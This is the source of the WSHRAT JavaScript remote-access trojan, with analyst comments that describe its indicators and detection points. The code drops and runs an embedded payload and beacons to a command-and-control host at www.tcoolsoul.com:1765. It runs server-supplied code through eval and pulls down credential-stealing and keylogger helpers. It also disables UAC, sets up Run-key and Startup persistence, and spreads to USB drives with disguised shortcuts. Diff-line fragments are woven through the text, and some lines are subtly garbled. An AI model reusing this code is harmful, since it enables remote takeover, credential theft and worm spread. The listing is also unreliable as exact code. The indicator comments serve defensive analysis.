// Analysis note - dropper stage.
// Decodes a base64 blob held in longText1 (the blob is elided in this listing),
// writes the decoded bytes to %appdata%\ljSULvdTZD.js and starts that file with
// "wscript //B" (batch mode, no prompts or error dialogs).
// The empty catch at the end swallows every failure, so nothing is shown to the user.
// Hunting pointers visible here: a script named ljSULvdTZD.js in the roaming
// profile, and wscript.exe being started against a .js file under %appdata%.
try
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var longText1 = "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
|
|
|
|
var wshShell1 = WScript.CreateObject("WScript.Shell") ;
|
2019-09-29 14:35:32 +00:00
|
|
|
var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");
|
2019-09-29 14:37:35 +00:00
|
|
|
var stubpath1 = appdatadir1 + "\\ljSULvdTZD.js";
|
|
|
|
var decoded1 = decodeBase64(longText1);
|
2019-09-29 14:35:32 +00:00
|
|
|
writeBytes(stubpath1, decoded1);
|
2019-09-29 14:37:35 +00:00
|
|
|
wshShell1.run("wscript //B \"" + stubpath1 + "\"") ;
|
|
|
|
}catch(er){}
// Writes `bytes` to the path `file` through an ADODB.Stream COM object.
//   file  - destination path
//   bytes - binary payload (the dropper passes the output of decodeBase64)
// Returns nothing; any COM error is swallowed by the empty catch.
// Analysis note: ADODB.Stream created from a Windows Script Host script and
// followed by SaveToFile is a file-drop primitive worth alerting on.
function writeBytes(file, bytes)
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
|
|
|
{
|
|
|
|
var binaryStream = WScript.CreateObject("ADODB.Stream");
|
|
|
|
// Type 1 = binary stream.
binaryStream.Type =1;
|
|
|
|
binaryStream.Open();
|
|
|
|
binaryStream.Write(bytes);
|
|
|
|
// Save option 2 = create the file or overwrite an existing one.
binaryStream.SaveToFile(file,2);
|
|
|
|
}
|
|
|
|
catch(err){}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Decodes a base64 string with the MSXML DOM instead of a hand-written decoder.
//   base64 - base64 text
// Returns the element's nodeTypedValue, i.e. the decoded binary value.
// Analysis note: a "bin.base64" typed XML element created from script is a
// frequently seen way of unpacking an embedded payload without extra tooling.
function decodeBase64(base64)
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var DM = WScript.CreateObject("Microsoft.XMLDOM") ;
|
|
|
|
var EL = DM.createElement("tmp");
|
2019-09-29 14:35:32 +00:00
|
|
|
EL.dataType = "bin.base64";
|
2019-09-29 14:37:35 +00:00
|
|
|
EL.text = base64;
|
2019-09-29 14:35:32 +00:00
|
|
|
return EL.nodeTypedValue;
|
|
|
|
}
// Analysis note - configuration and globals of the remote-access stage.
//   host / port    - command-and-control endpoint; the request helpers in this
//                    file build "http://" + host + ":" + port, i.e. clear-text HTTP.
//                    Network indicators on this page: www.tcoolsoul.com, port 1765.
//   installdir     - %appdata%, replaced by %temp% when that folder does not exist.
//   lnkfile/lnkfolder - switches read by install() before it creates shortcuts.
//   installname    - file name of the running script; reused for the installed copy.
//   spliter        - "|" field separator for C2 messages.
//   sleep          - value handed to WScript.sleep() by the polling loop.
//   inf, usbspreading - caches filled by information() and instance().
// instance() on the last line runs the start-up routine before polling begins.
wshShell1 = null;
|
|
|
|
var host = "www.tcoolsoul.com";
|
|
|
|
var port = 1765;
|
|
|
|
var installdir ="%appdata%";
|
|
|
|
var lnkfile = true;
|
2019-09-29 14:35:32 +00:00
|
|
|
var lnkfolder = true;
|
2019-09-29 14:37:35 +00:00
|
|
|
var shellobj = WScript.CreateObject("wscript.shell");
|
|
|
|
var filesystemobj = WScript.CreateObject("scripting.filesystemobject");
|
|
|
|
var httpobj = WScript.CreateObject("msxml2.xmlhttp");
|
2019-09-29 14:35:32 +00:00
|
|
|
var installname = WScript.scriptName;
|
2019-09-29 14:37:35 +00:00
|
|
|
var startux = shellobj.specialFolders("startup" + "\\");
|
|
|
|
installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";
|
|
|
|
if(!filesystemobj.folderExists(installdir)){installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}
|
2019-09-29 14:35:32 +00:00
|
|
|
var spliter = "|";
|
2019-09-29 14:37:35 +00:00
|
|
|
var sleep = 5008;
|
2019-09-29 14:35:32 +00:00
|
|
|
var response, cmd, param, oneonce;
|
|
|
|
var inf = "";
|
|
|
|
var usbspreading = "";
|
|
|
|
var startdate = "";
|
|
|
|
instance();
// Analysis note - C2 polling loop and command dispatcher.
// Every iteration calls install(), sends an "is-ready" request through post()
// and splits the reply on `spliter`; cmd[0] names the action and cmd[1..] carry
// its arguments. The whole body sits in a try with an empty catch, so a failing
// command is silently dropped, and the loop then waits WScript.sleep(sleep).
// The case labels double as protocol indicators for network or memory signatures:
// disconnect, reboot, shutdown, excecute (sic), get-pass, get-pass-offline,
// update, uninstall, up-n-exec, bring-log, down-n-exec, filemanager, rdp,
// keylogger, offline-keylogger, browse-logs, cmd-shell, get-processes,
// disable-uac, elevate, if-elevate, kill-process, sleep.
while(true)
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
|
|
|
install();
|
2019-09-29 14:37:35 +00:00
|
|
|
response = "";
|
2019-09-29 14:35:32 +00:00
|
|
|
response = post("is-ready","");
|
|
|
|
cmd = response.split(spliter);
|
|
|
|
switch(cmd[0])
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
case "disconnect":
|
|
|
|
WScript.quit();
|
|
|
|
break;
|
|
|
|
case "reboot":
|
|
|
|
shellobj.run("%comspec% /c shutdown /r /t 0(/f", 8, true);
|
|
|
|
break;
|
|
|
|
case "shutdown":
|
|
|
|
shellobj.run("%comspec%(/c shutdown(/s(/t(0 /f", 0, true);
|
|
|
|
break;
|
|
|
|
// The reply text is passed straight to eval(): whoever controls the server
// (or the clear-text HTTP channel) controls code run inside wscript.exe.
case "excecute":
|
|
|
|
param = cmd[1];
|
|
|
|
eval(param);
|
|
|
|
break;
|
|
|
|
// Both credential commands fetch a helper saved as cmdc.exe; see passgrabber
// and passgrabber2 for the artefacts they leave behind.
case "get-pass":
|
|
|
|
passgrabber(cmd[1], "cmdc.exe", cmd[2]);
|
|
|
|
break;
|
|
|
|
case "get-pass-offline":
|
|
|
|
passgrabber2(cmd[1],"cmdc.exe", cmd[2]);
|
|
|
|
break;
|
|
|
|
// Self-update: everything after the first "|" of the reply replaces the
// installed script, which is then restarted. No `break` follows; the case
// ends with a quit call instead.
case "update":
|
|
|
|
param = response.substr(response.indexOf("|") + 1);
|
|
|
|
oneonce.close();
|
|
|
|
oneonce = filesystemobj.openTextFile(installdir + installname ,2, false);
|
|
|
|
oneonce.write(param);
|
|
|
|
oneonce.close();
|
|
|
|
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
|
|
|
|
updatestatus("Updated");
|
|
|
|
wscript.quit();
|
|
|
|
case "uninstall":
|
|
|
|
uninstall();
|
|
|
|
break;
|
|
|
|
case "up-n-exec":
|
|
|
|
download(cmd[1],cmd[2]);
|
|
|
|
break;
|
|
|
|
// Logs are read from the "wshlogs" folder below installdir.
case "bring-log":
|
|
|
|
upload(installdir +"wshlogs\\" + cmd[1], "take-log");
|
|
|
|
break;
|
|
|
|
case "down-n-exec":
|
|
|
|
sitedownloader(cmd[1],cmd[2]);
|
|
|
|
break;
|
|
|
|
// Plugin file names used below (fm-plugin.exe, rd-plugin.exe, kl-plugin.exe)
// are written under installdir and are usable as file-name indicators.
case "filemanager":
|
|
|
|
servicestarter(cmd[1],"fm-plugin.exe", information());
|
|
|
|
break;
|
|
|
|
case "rdp":
|
|
|
|
servicestarter(cmd[1], "rd-plugin.exe", information());
|
|
|
|
break;
|
|
|
|
case "keylogger":
|
|
|
|
keyloggerstarter(cmd[1], "kl-plugin.exe", information(),0);
|
|
|
|
break;
|
|
|
|
case "offline-keylogger":
|
|
|
|
keyloggerstarter(cmd[1],"kl-plugin.exe", information(), 1);
|
|
|
|
break;
|
|
|
|
case "browse-logs":
|
|
|
|
post("is-logs", enumfaf(installdir + "wshlogs" ));
|
|
|
|
break;
|
|
|
|
case "cmd-shell":
|
|
|
|
param = cmd[1];
|
|
|
|
post("is-cmd-shell",cmdshell(param));
|
|
|
|
break;
|
|
|
|
case "get-processes":
|
|
|
|
post("is-processes", enumprocess());
|
|
|
|
break;
|
|
|
|
// Runs only when the script was started with the /elevated named argument.
// Targets EnableLUA and ConsentPromptBehaviorAdmin under
// ...\CurrentVersion\Policies\System through WMI StdRegProv; auditing writes to
// those two values is a direct detection for UAC tampering.
case "disable-uac":
|
|
|
|
if(WScript.Arguments.Named.Exists("elevated") == true)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
|
|
|
|
oReg.SetDwordValue(0x80800802,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","EnableLUA",0);
|
|
|
|
oReg.SetDwordValue(0x80080082,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","ConsentPromptBehaviorAdmin", 0);
|
|
|
|
oReg = null;
|
|
|
|
updatestatus("UAC+Disabled+Reboot+Required");
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
break;
|
|
|
|
// Relaunch request using the Shell.Application "runas" verb and the /elevated
// argument, then quit the current instance. wscript.exe appearing with
// "/elevated" on its command line is the observable side effect.
case "elevate":
|
|
|
|
if(WScript.Arguments.Named.Exists("elevated") == false)
|
|
|
|
{
|
|
|
|
try
|
|
|
|
{
|
|
|
|
oneonce.close();
|
|
|
|
oneonce = null;
|
|
|
|
WScript.CreateObject("Shell.Application" .ShellExecute("wscript.exe"," //B \"" + WScript.ScriptFullName + "\" /elevated", "","runas",1));
|
|
|
|
updatestatus("Client+Elevated");
|
|
|
|
}
|
|
|
|
catch(nn){}
|
|
|
|
WScript.quit();
|
|
|
|
}
|
|
|
|
else {updatestatus("Client+Elevated");}
|
|
|
|
break;
|
|
|
|
case "if-elevate":
|
|
|
|
if(WScript.Arguments.Named.Exists("elevated") == false){updatestatus("Client+Not+Elevated");}
|
|
|
|
else{updatestatus("Client+Elevated");}
|
|
|
|
break;
|
|
|
|
case "kill-process":
|
|
|
|
exitprocess(cmd[1]);
|
|
|
|
break;
|
|
|
|
// Second eval() on server-supplied text; the result is stored in `sleex`.
case "sleep":
|
|
|
|
param = cmd[1];
|
|
|
|
sleex = eval(param);
|
|
|
|
break;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
catch(er){}
|
|
|
|
WScript.sleep(sleep);
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Analysis note - persistence refresh plus removable-media propagation.
// Takes no arguments and returns nothing. Called on every pass of the polling loop.
// Steps as laid out in this listing:
//   1. upstart() re-applies the autorun entries.
//   2. All drives are enumerated; only ready drives with free space and
//      drivetype == 1 (removable, in the FileSystemObject API) are processed.
//   3. The running script is copied to the drive root and given attributes = 6
//      (hidden + system).
//   4. When lnkfile is set, root files that are not .lnk get attributes = 6 and a
//      same-named .lnk is created with target cmd.exe, window style 7 (minimized)
//      and "/c start ..." arguments naming the script and the original file.
//   5. When lnkfolder is set, root folders get the same treatment, with
//      "start explorer" in the shortcut arguments.
// Icons are looked up in HKLM\software\classes so the shortcut resembles the
// original item. Each stage has its own empty catch, so errors are silent.
// Triage pointers: .lnk files at the root of removable media whose target is
// cmd.exe, next to hidden+system originals and a hidden script copy.
function install()
|
|
|
|
{
|
|
|
|
var lnkobj;
|
|
|
|
var filename;
|
|
|
|
var foldername;
|
|
|
|
var fileicon;
|
|
|
|
var foldericon;
|
|
|
|
upstart();
|
2019-09-29 14:37:35 +00:00
|
|
|
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext())
|
|
|
|
{
|
|
|
|
var drive = dri.item();
|
|
|
|
if (drive.isready == true)
|
|
|
|
{
|
|
|
|
if (drive.freespace > 8 )
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if (drive.drivetype == 1)
|
|
|
|
{
|
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
filesystemobj.copyFile(WScript.scriptFullName , drive.path + "\\" + installname,true);
|
|
|
|
if (filesystemobj.fileExists (drive.path +"\\" + installname))
|
|
|
|
{filesystemobj.getFile(drive.path + "\\" + installname).attributes = 6;}
|
|
|
|
}
|
|
|
|
catch(eiju){}
|
|
|
|
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\" .files)); !fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var file = fi.item();
|
|
|
|
if(lnkfile == false){break;}
|
|
|
|
if (file.name.indexOf("."))
|
|
|
|
{
|
|
|
|
if (file.name.split(".")[file.name.split(".").length -1].toLowercase != "lnk" )
|
|
|
|
{
|
|
|
|
file.attributes =6;
|
|
|
|
if((file.name.toUppercase) != installname.toUppercase)
|
|
|
|
{
|
|
|
|
filename = file.name.split(".");
|
|
|
|
lnkobj = shellobj.createShortcut(drive.path + "\\" + filename[0] +".lnk");
|
|
|
|
lnkobj.windowStyle = 7;
|
|
|
|
lnkobj.targetPath = "cmd.exe";
|
|
|
|
lnkobj.workingDirectory ="";
|
|
|
|
lnkobj.arguments ="/c start " + installname.replace(new RegExp(" ", "g" , "\" \"" + "&start ")+ file.name.replace(new RegExp(" ", "g" , "\" \"" +"&exit")));
|
|
|
|
try
|
|
|
|
{
|
|
|
|
fileicon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead( "HKEY_LOCAL_MACHINE\\software\\classes\\.") + file.name.split(".")[file.name.split(".").length -1]+ "\\" +"\\defaulticon\\");
|
|
|
|
}
|
|
|
|
catch(eeee){}
|
|
|
|
if(fileicon.indexOf(",") == 8){lnkobj.iconLocation = file.path;}
|
|
|
|
else {lnkobj.iconLocation = fileicon;}
|
|
|
|
lnkobj.save();
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
catch(err){}
|
|
|
|
}
|
|
|
|
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\" .subFolders));!fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
try
|
|
|
|
{
|
|
|
|
var folder = fi.item();
|
|
|
|
if (lnkfolder == false){break;}
|
|
|
|
folder.attributes =6;
|
|
|
|
foldername = folder.name;
|
|
|
|
lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
|
|
|
|
lnkobj.windowStyle = 7;
|
|
|
|
lnkobj.targetPath = "cmd.exe";
|
|
|
|
lnkobj.workingDirectory = "";
|
|
|
|
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ","g" ,"\" \"" + "&start explorer ") + folder.name.replace(new RegExp(" ", "g" , "\" \"" +"&exit")));
|
|
|
|
foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
|
|
|
|
if(foldericon.indexOf(",") == 8){lnkobj.iconLocation = folder.path;}
|
|
|
|
else {lnkobj.iconLocation = foldericon;}
|
|
|
|
lnkobj.save();
|
|
|
|
}
|
|
|
|
catch(err){}
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
}
|
|
|
|
}
// Analysis note - self-removal routine, reached through the "uninstall" command.
// Takes no arguments; always ends in WScript.quit().
// What it touches is also the checklist for manual clean-up:
//   - Run values named after the script's base name under HKCU and HKLM
//     ...\software\microsoft\windows\currentversion\run
//   - the copy in the Startup folder and the running script file
//   - on removable drives (drivetype == 1): attributes of root files and folders
//     are reset to 0 and the .lnk shortcuts plus the script copy are deleted
// All failures are swallowed, so a partial removal leaves no error trace.
function uninstall()
|
|
|
|
{
|
|
|
|
try
|
|
|
|
{
|
|
|
|
var filename;
|
|
|
|
var foldername;
|
|
|
|
try
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
|
|
|
|
shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(ei){}
|
|
|
|
try
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
filesystemobj.deleteFile(startup + installname ,true);
|
|
|
|
filesystemobj.deleteFile(WScript.scriptFullName ,true);
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(eej){}
|
|
|
|
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext())
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
var drive = dri.item();
|
|
|
|
if (drive.isready == true)
|
|
|
|
{
|
|
|
|
if (drive.freespace > 8 )
|
|
|
|
{
|
|
|
|
if (drive.drivetype == 1)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path +"\\" .files)); !fi.atEnd(); fi.moveNext())
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var file = fi.item();
|
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if (file.name.indexOf("." ))
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if ((file.name.split(".")[file.name.split(".").length -1]).toLowercase !="lnk" )
|
|
|
|
{
|
|
|
|
file.attributes =0;
|
|
|
|
if (file.name.toUppercase != installname.toUppercase)
|
|
|
|
{
|
2019-09-29 14:35:32 +00:00
|
|
|
filename = file.name.split(".");
|
2019-09-29 14:37:35 +00:00
|
|
|
filesystemobj.deleteFile(drive.path + "\\" + filename[0] + ".lnk" );
|
|
|
|
}
|
|
|
|
else{filesystemobj.deleteFile(drive.path + "\\" + file.name);}
|
|
|
|
}
|
|
|
|
else{filesystemobj.deleteFile(file.path);}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
catch(ex){}
|
|
|
|
}
|
|
|
|
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path +"\\" .subFolders)); !fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
var folder = fi.item();
|
|
|
|
folder.attributes = 0;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
}
|
|
|
|
catch(err){}
|
|
|
|
WScript.quit();
|
|
|
|
}
// Sends one request to the C2 endpoint and returns the reply text.
//   cmd   - path component appended to http://host:port/ (for example "is-ready")
//   param - request body
// Returns httpobj.responseText, or "" when anything throws.
// The request is synchronous (third argument false) and unencrypted.
// Analysis note: the value passed to setRequestHeader is the host fingerprint
// from information(), which in this file starts with "WSHRAT" + "|" - a strong
// string for proxy or IDS matching on outbound POSTs.
function post(cmd ,param)
|
|
|
|
{
|
|
|
|
try
|
2019-09-29 14:37:35 +00:00
|
|
|
{
|
|
|
|
httpobj.open("post","http://" + host +":" + port +"/" + cmd, false);
|
|
|
|
httpobj.setRequestHeader("user-agent:",information());
|
|
|
|
httpobj.send(param);
|
|
|
|
return httpobj.responseText;
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
catch(err){return "";}
|
|
|
|
}
// Builds the host fingerprint that accompanies every C2 request and caches it
// in the global `inf`; later calls return the cached string.
// Field order after assembly, separated by `spliter`:
//   "WSHRAT", hwid(), %computername%, %username%, OS caption from WMI, "plus",
//   security() (installed AV names), usbspreading marker, "JavaScript-v1.2"
// Returns "" when any step throws.
// Analysis note: the literal prefix and suffix are fixed strings on this page
// and can be used to recognise this family's traffic.
function information()
|
|
|
|
{
|
|
|
|
try
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if (inf == "" )
|
|
|
|
{
|
|
|
|
inf = hwid() + spliter;
|
|
|
|
inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter ;
|
|
|
|
inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
|
|
|
|
var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
|
|
|
|
var os = root.ExecQuery("select(* from win32_operatingsystem");
|
|
|
|
for(var fi = new Enumerator(os);!fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
var osinfo = fi.item();
|
|
|
|
inf = inf + osinfo.caption + spliter;
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
inf = inf +"plus" + spliter;
|
|
|
|
inf = inf + security() + spliter;
|
|
|
|
inf = inf + usbspreading;
|
|
|
|
inf ="WSHRAT" + spliter + inf + spliter + "JavaScript-v1.2";
|
|
|
|
return inf;
|
|
|
|
}
|
|
|
|
else{return inf;}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
catch(err){return "";}
|
|
|
|
}
// Analysis note - persistence.
// Writes a Run value named after the script's base name under both
// HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE
// ...\software\microsoft\windows\currentversion\run, with a wscript.exe command
// line pointing at installdir + installname, then copies the running script to
// installdir and to the Startup folder.
// Registry errors are caught separately (presumably so that a refused HKLM
// write does not stop the file copies - confirm), and the outer catch swallows
// the rest. Takes no arguments and returns nothing.
// Detection: Run-key data that starts wscript.exe with //B against a script in
// %appdata% or %temp%, and script files appearing in the Startup folder.
function upstart()
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
|
|
|
try
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
|
|
|
{
|
|
|
|
shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" ,"REG_SZ");
|
|
|
|
shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe(//B \"" + installdir + installname + "\"" , "REG_SZ");
|
|
|
|
}
|
|
|
|
catch(ei){}
|
|
|
|
filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
|
|
|
|
filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
catch(err){}
|
|
|
|
}
// Returns a machine identifier for the C2 fingerprint: the volumeSerialNumber
// of the first Win32_LogicalDisk entry whose serial is not empty.
// Returns "" on a WMI error, and undefined when no disk qualifies (the loop
// ends without a return). The `break` after `return` is never reached.
function hwid()
|
|
|
|
{
|
|
|
|
try
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
|
|
|
|
var disks = root.ExecQuery ("select * from win32_logicaldisk");
|
|
|
|
for(var fi = new Enumerator(disks);!fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
var disk = fi.item();
|
|
|
|
if (disk.volumeSerialNumber!="")
|
|
|
|
{
|
|
|
|
return disk.volumeSerialNumber;
|
|
|
|
break;
|
|
|
|
}
|
|
|
|
}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
catch(err){return "";}
|
|
|
|
}
// Analysis note - security-product reconnaissance.
// Reads the OS version from Win32_OperatingSystem, picks the WMI namespace
// root\securitycenter2 when the computed version is above 6 and
// root\securitycenter otherwise, then lists AntiVirusProduct display names.
// Returns the names concatenated with " ." after each one, or "nan-av" when
// none is reported. On an exception the empty catch leaves the result undefined.
// The version number is produced with eval() on a string built from the
// version parts rather than with a numeric parser.
// Detection: AntiVirusProduct queries issued by wscript.exe or cscript.exe are
// unusual for ordinary scripts and are a useful behavioural signal.
function security()
|
|
|
|
{
|
|
|
|
try
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
|
|
|
|
var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem",null,48);
|
|
|
|
var versionstr, osversion;
|
|
|
|
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
var objitem = fi.item();
|
|
|
|
versionstr = objitem.version.toString().split(".");
|
|
|
|
}
|
|
|
|
osversion = versionstr[0] +".";
|
|
|
|
for (var x = 1; x < versionstr.length; x++){osversion = osversion + versionstr[0];}
|
|
|
|
osversion = eval(osversion);
|
|
|
|
var sc;
|
|
|
|
if (osversion >6){ sc ="securitycenter2"; }
|
|
|
|
else{ sc = "securitycenter";}
|
|
|
|
var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
|
|
|
|
var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct","wql", 0);
|
|
|
|
var secu = "";
|
|
|
|
for(var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext())
|
|
|
|
{
|
|
|
|
var objantivirus = fi.item();
|
|
|
|
secu = secu + objantivirus.displayName +" .";
|
|
|
|
}
|
|
|
|
if(secu =="" ){secu = "nan-av";}
|
|
|
|
return secu;
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
catch(err){}
|
|
|
|
}
// Returns the current local date as text in day/month/year order, built from
// Date.getDate(), getMonth() + 1 and getYear(). No zero padding is applied.
// Used by instance() to timestamp the infection marker stored in the registry.
function getDate()
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
var s ="";
|
|
|
|
var d = new Date();
|
|
|
|
s += d.getDate() +"/";
|
|
|
|
s += d.getMonth() +1 + "/";
|
2019-09-29 14:35:32 +00:00
|
|
|
s += d.getYear();
|
|
|
|
return s;
|
|
|
|
}
// Analysis note - start-up routine, run once before the polling loop.
//   1. Reads the default value of HKEY_LOCAL_MACHINE\software\<script base name>\
//      into usbspreading. When it is empty, a marker is written there:
//      "true - <date>" if the script path looks like "<drive>:\<installname>"
//      (started from a drive root), otherwise "false - <date>".
//   2. upstart() applies persistence.
//   3. If the running file is not the installed copy (short paths compared),
//      the installed copy is launched and this instance quits.
//   4. Otherwise the installed script is opened in append mode (8) and the
//      handle is kept in the global `oneonce` - presumably to hold the file
//      open as a single-instance guard; confirm against runtime behaviour.
// Any exception in the outer try ends the process through WScript.quit().
// Forensics: a key named after the script under HKLM\software holding a
// "true - " or "false - " date string records when and how the host was reached.
function instance()
|
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
try {usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\");}
|
|
|
|
catch(eee){}
|
|
|
|
if(usbspreading == "" )
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
if (WScript.scriptFullName.substr(1).toLowercase == ":\\" + installname.toLowercase)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
usbspreading = "true - " + getDate();
|
|
|
|
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}
|
|
|
|
catch(eeeee){}
|
|
|
|
}
|
|
|
|
else
|
|
|
|
{
|
|
|
|
usbspreading = "false - " + getDate();
|
|
|
|
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}
|
|
|
|
catch(eeeee){}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
upstart();
|
|
|
|
var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
|
|
|
|
var installfullnameshort = filesystemobj.getFile(installdir + installname);
|
|
|
|
if (scriptfullnameshort.shortPath.toLowercase != installfullnameshort.shortPath.toLowercase)
|
2019-09-29 14:35:32 +00:00
|
|
|
{
|
2019-09-29 14:37:35 +00:00
|
|
|
shellobj.run("wscript.exe(//B \"" + installdir + installname + "\"");
|
|
|
|
WScript.quit();
|
|
|
|
}
|
|
|
|
oneonce = filesystemobj.openTextFile(installdir + installname ,8, false);
|
2019-09-29 14:35:32 +00:00
|
|
|
}
|
2019-09-29 14:37:35 +00:00
|
|
|
catch(err){WScript.quit();}
|
2019-09-29 14:35:32 +00:00
|
|
|
}
// Analysis note - credential collection with upload ("get-pass" command).
//   fileurl  - URL the helper executable is fetched from (supplied by the server)
//   filename - name the helper is saved under in installdir (the dispatcher
//              passes "cmdc.exe")
//   retcmd   - C2 path the collected output is uploaded to
// Flow: kill any process named `filename`, remove an old "<filename>data"
// output, write a .cfg file next to the helper, fetch the helper over HTTP,
